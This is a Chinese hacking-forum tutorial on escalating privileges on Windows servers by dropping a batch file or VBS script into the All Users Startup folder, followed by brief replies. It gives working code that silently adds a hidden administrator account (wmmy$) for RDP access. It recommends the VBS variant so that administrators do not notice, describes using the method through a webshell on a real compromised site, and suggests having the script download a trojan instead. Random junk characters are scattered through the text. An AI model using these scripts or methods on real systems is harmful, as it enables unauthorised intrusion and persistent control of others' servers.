返回列表 发帖

[原创教程] 3AST提权课程之启动项提权

大家好,我是完美蚂蚁 今天给大家带来的提权教程是
; D& K7 B: o3 b. I启动 提权, d! z) U& Y1 C) l
C:\Docume~1\All Users\「开始」菜单\程序\启动
( d: w; u0 S  l2 r: [6 Q* H在这里必须有写入权限 否则此方法无效9 n6 `( k) T9 g$ m2 X3 t
因为我是在网吧 这里显示不了路径
  b7 X+ G# ?8 c) S3 `* k6 D( S我去服务器上演示给大家看! [9 }) O8 o4 x# i  E- M
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
) V$ O, I; a$ M0 B) J文件 从而运行我们的文件) O7 z- s7 z4 K
这里有两中方式 第一种是批处理
- ?1 |9 Z% x1 M9 f! R0 o我们来看下目前 我机器上的用户组
1 X, e6 d' q$ |4 |0 i* h. b' |9 l8 |目前我们没有521这个用户1 _7 M! k" _% Z: I9 l# T4 _7 X
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示5 U# F4 j2 Y; r! ^9 i
大家看到了吧  如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
( @( a# c! h* q0 V9 ]1 R3 q6 ?6 ?下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
; g: ]5 g2 p+ f* u$ p! D2 l大家看 已经成功加入了WMMY用户
# T: y+ {  U1 k! ?网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了& k/ i# X1 w8 h! ]; G
当前终端服务端口: 3389$ M$ E2 n  N! H" m: D/ f. \
系统自动登录功能未开启
$ i; A3 l( h* e4 c. t3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了' ^/ F5 S9 Y$ V7 l
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径; v# p& A- ~# G5 ~' a7 a: G
第一种隐蔽性太差  我们就用第二种吧
4 y. m/ F( b$ G已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
2 \8 j- K' C4 e3 ~7 P3 U1 @从而取得了3389的登陆权限) V; f# m2 F2 }/ o0 x& ?2 g
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马7 a6 F+ l8 b% G" h- e, Y
基本原理都差不多  我就不多介绍了
$ F3 }8 r. T: C  ~0 N% h教程结束```: [/ Q3 B7 Q/ ~  T3 D/ @5 V
@echo off* N7 Z" @8 X$ }9 H4 U9 c
net user 521 521 /add
$ S; {  M! D$ w% U' A: mnet localgroup administrators 521 /add4 X! ?! r# T) U* V: \! a/ [0 f3 r
. B5 w- A8 l% ?) D
on Error Resume next! z) \/ m% i2 e( d, ]. T
set wshshell=createobject("wscript.shell")
2 L. Z% Q6 H; ^( da=wshshell.run("net user wmmy$ 1227 /add",0)
8 Z: C* V$ ?7 Z! s8 qa=wshshell.run("net localgroup administrators wmmy$ /add",0)% _# F9 j  `2 Y  b4 L
. ~7 b  s+ W' L" l1 w

, n, f) q% @* W9 r6 u点击下载9 E3 r' D0 X& U7 X\" h
2

评分人数

  • 柔肠寸断

  • zhuyahui

不建议是用纳米~~很垃圾~。

TOP

+个分 能要是管理的权限啊~。

TOP

写的不错哦~~~~~! l2 s6 s  O! q* s

! F1 K1 q- r) ?昨天有事情没有上了
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰

于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

顶下~一下加这么多啊~BS下~:lol

TOP

顶下小柔
: y, `* c% C% Y0 w看看~;P

TOP

返回列表